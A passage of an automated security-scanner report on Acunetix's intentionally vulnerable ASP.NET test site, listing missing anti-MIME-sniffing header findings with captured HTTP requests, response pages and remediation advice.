          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        8. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        9. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
